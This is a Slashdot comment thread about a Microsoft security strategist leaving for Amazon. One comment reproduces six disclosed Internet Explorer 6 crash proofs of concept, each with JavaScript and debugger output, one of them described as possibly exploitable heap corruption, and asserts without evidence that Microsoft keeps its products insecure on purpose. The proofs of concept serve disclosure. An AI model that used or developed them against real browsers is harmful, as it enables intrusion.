A short review of Microsoft Security: (1)

Futurepower(R) (558542) | more than 8 years ago | (#15808136)

I don't know why he is leaving. Being a "Microsoft Security Guru" is apparently a job with no duties. See this movie: 144,000 known viruses for Microsoft operating systems. [apple.com]

It appears to me that Microsoft products are deliberately not secure. Because Microsoft has a temporary monopoly, Microsoft makes more money when its product is more defective.

One of the main purposes of Vista is to get people to buy new computers. Microsoft makes most of its money by selling to computer manufacturers, and Microsoft is able to do what they want, not what is good for the customers. That's the reason Microsoft doesn't fix the bugs in Internet Explorer. When computers become slow because of viruses and spyware, people usually buy a new computer.

If Microsoft cared about its customers, it would fix these bugs in Internet Explorer, and many others:

ADODB.Recordset Filter Property

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The interesting thing about this bug is how the same property has to be set three different times to trigger the exception.

a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }

eax=001dbfdc ebx=02820e18 ecx=02821288
edx=028212a8 esi=02821288 edi=00000000
eip=4de194f7 esp=0013ade8 ebp=0013adf0
msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.


Internet.HHCtrl Image Property

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XPSP2 system. This bug is interesting because a small heap overflow occurs eachtime this property is set. The bug is difficult to detect unless heap verification has been enabled in the global debug flags for iexplore.exe. The demonstration below results in a possibly exploitable heap corruption after128 or more iterations of the property set.

var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;

for (var i=0; i<4096; i++) {
a['Image'] = b + "";
}

eax=00030288 ebx=00030000 ecx=7ffdd000
edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??

This bug was reported to Microsoft on March 6th, 2006.


StructuredGraphicsControl SourceURL

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug appears to be triggered by a call to URLOpenBlockingStream() with a NULLpointer referenced by the ppStream argument. The only way I found to trigger this bug is by creating the object through the ActiveXObject interface -- using the standard object/classid syntax (as described here [webdevelopersjournal.com] ) does not result in a crash.

var a = new ActiveXObject('DirectAnimation.StructuredGraphicsC ontrol');
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';

eax=00000000 ebx=7726d35c ecx=02481f30
edx=0013b1a4 esi=00000000 edi=00000000
eip=772ba3bc esp=0013b18c ebp=0013b1b8
urlmon!CBaseBSCB::KickOffDownload+0x7a:
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.


Table.Frameset

The following bug was tested on the latest version of Internet Explorer 6on a fully-patched Windows XP SP2 system. This bug was found by Aviv Raff using the DOM-Hanoi [metasploit.com] fuzzer script. DOM-Hanoi works by building trees of every combination of elements up to the specifed depth. An alternate PoC could use plain HTML instead of javascript.

var a = document.createElement('table');
var b = document.createElement('frameset');
a.appendChild(b);

eax=00000000 ebx=01884710 ecx=01886c60
edx=00000027 esi=0013aeb0 edi=01884730
eip=7dc995ad esp=0013ae88 ebp=0013ae9c6
mshtml!CTreePos::NextTreePos+0x23:
7dc995ad f60010 test byte ptr [eax],0x10 ds:0023:00000000=??

This bug was reported to Microsoft in March of 2006.


DirectAnimation.DAUserData Data

The following bug was tested on the latest version of Internet Explorer 6on a fully-patched Windows XP SP2 system. The "Data" property of theDAUserData object is designed to be accessed only after it has been initialized. We can trigger a NULL dereference by asking for it without calling the Init() method first.

var a = new ActiveXObject('DirectAnimation.DAUserData');
a.Data = 'Hello';

eax=00000000 ebx=5a327320 ecx=00000000
edx=0003b7c8 esi=00000000 edi=0003f1cc
eip=5a3415b6 esp=0013b1a4 ebp=0013b1b4
danim!CRUserDataImpl::GetData+0x5:
5a3415b6 837e0800 cmp dword ptr [esi+0x8],0x0 ds:0023:00000008=????????

This bug was reported to Microsoft in March of 2006.


Object.Microsoft.DXTFilter Enabled

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. By setting the 'Enabled' property of this control to a true value, we can trigger a NULL dereference.

var a = new ActiveXObject('Object.Microsoft.DXTFilter');
a.Enabled = 1;

eax=00000000 ebx=6bdd4728 ecx=00001008
edx=001bffff esi=02910488 edi=00000000
eip=6bde8881 esp=0013b250 ebp=0013b258
dxtrans!CDXTFilter::put_Enabled+0x75:
6bde8881 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug was reported to Microsoft in March of 2006.

For more Microsoft Internet Explorer bugs, see the Browserfun Blog [blogspot.com] .

My initial reaction (1)

ElephanTS (624421) | more than 8 years ago | (#15808171)

MS Security Guru

[snigger]

Re:My initial reaction (1)

Brother Seamus (937658) | more than 8 years ago | (#15808897)

And in other news... Jeff Bezos has hired Willie Nelson to do his taxes, Martha Stewart to handle his investments and Joseph Hazelwood to captain his yacht.

Resume (2, Funny)

jmurano (90735) | more than 8 years ago | (#15808295)

If I had been a 'senior security strategist' at Microsoft for the last five years... I'd leave that off of my resume!

Time To Stop Shopping at Amazon (1)

penguinstorm (575341) | more than 8 years ago | (#15808448)

Given how Microsoft's security track record has gone, I think I shall take my online books business to a new vendor.

Great (2, Funny)

/dev/trash (182850) | more than 8 years ago | (#15808659)

Free crap from Amazon this Christmas!

M$ Security Guru (1)

disturbedite (979015) | more than 8 years ago | (#15808680)

i didn't know there was such a thing

demotion? (1)

eliot1785 (987810) | more than 8 years ago | (#15808871)

This seems like a demotion to me. The security problems Amazon.com faces can't possibly be as big as the security problems Microsoft faces. It is relatively easy to harden a server farm, compared to making an operating system that can stay reasonably secure even when run by novices and below.

Re:demotion? (0)

Anonymous Coward | more than 8 years ago | (#15809723)

leaving the *impossible* for the possible might be worthwhile.

imho, though, he's jumped from one stagnating, albeit brutally rich, company for another company that may do even worse over the next 5 years or so.

Re:demotion? (1)

CxDoo (918501) | more than 8 years ago | (#15810523)

That's what occured to me too.

The Cold War perspective (yay, another one defected from Evil Empire!) is amusing, but not very insightful. Why would someone of any ambition to leave mark in OS security switch from MS to Amazon? It doesn't even compare.
I'd rather say the guy was not very important, was offered more money (i.e. not very important) or was ditched (...) .

Maybe he should get together... (1)

mcgroarty (633843) | more than 8 years ago | (#15809521)

Maybe he should get together with the Enron accounting guru.

Security Seminars (1)

York the Mysterious (556824) | more than 8 years ago | (#15809615)

I went to a MS security seminar where he was the presenter. He did a really amazing job and cracked a lot of MS jokes. Showed the lack of security in MS products and where it really wasn't as big as it was hyped to be. He was a great presenter and a nice guy. Helped me with some questions. MS lost a good employee here.

MS Security guru leaving for Amazon? (1)

onwardknave (533210) | more than 8 years ago | (#15810512)

Sweet! Free books and movies!

Simple word-counting (0)

Anonymous Coward | more than 8 years ago | (#15810528)

At the time I'm posting, I counted the occurrences of the word "chair" in the visible threads (threshold: 1).
It's 7 out of 72 threads. A clean 10% of posters give credit to Mr. Ballmer habits.

Wait wait wait... (1)

Garridan (597129) | more than 8 years ago | (#15813124)

Microsoft has a security guru? What OS does he use?
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>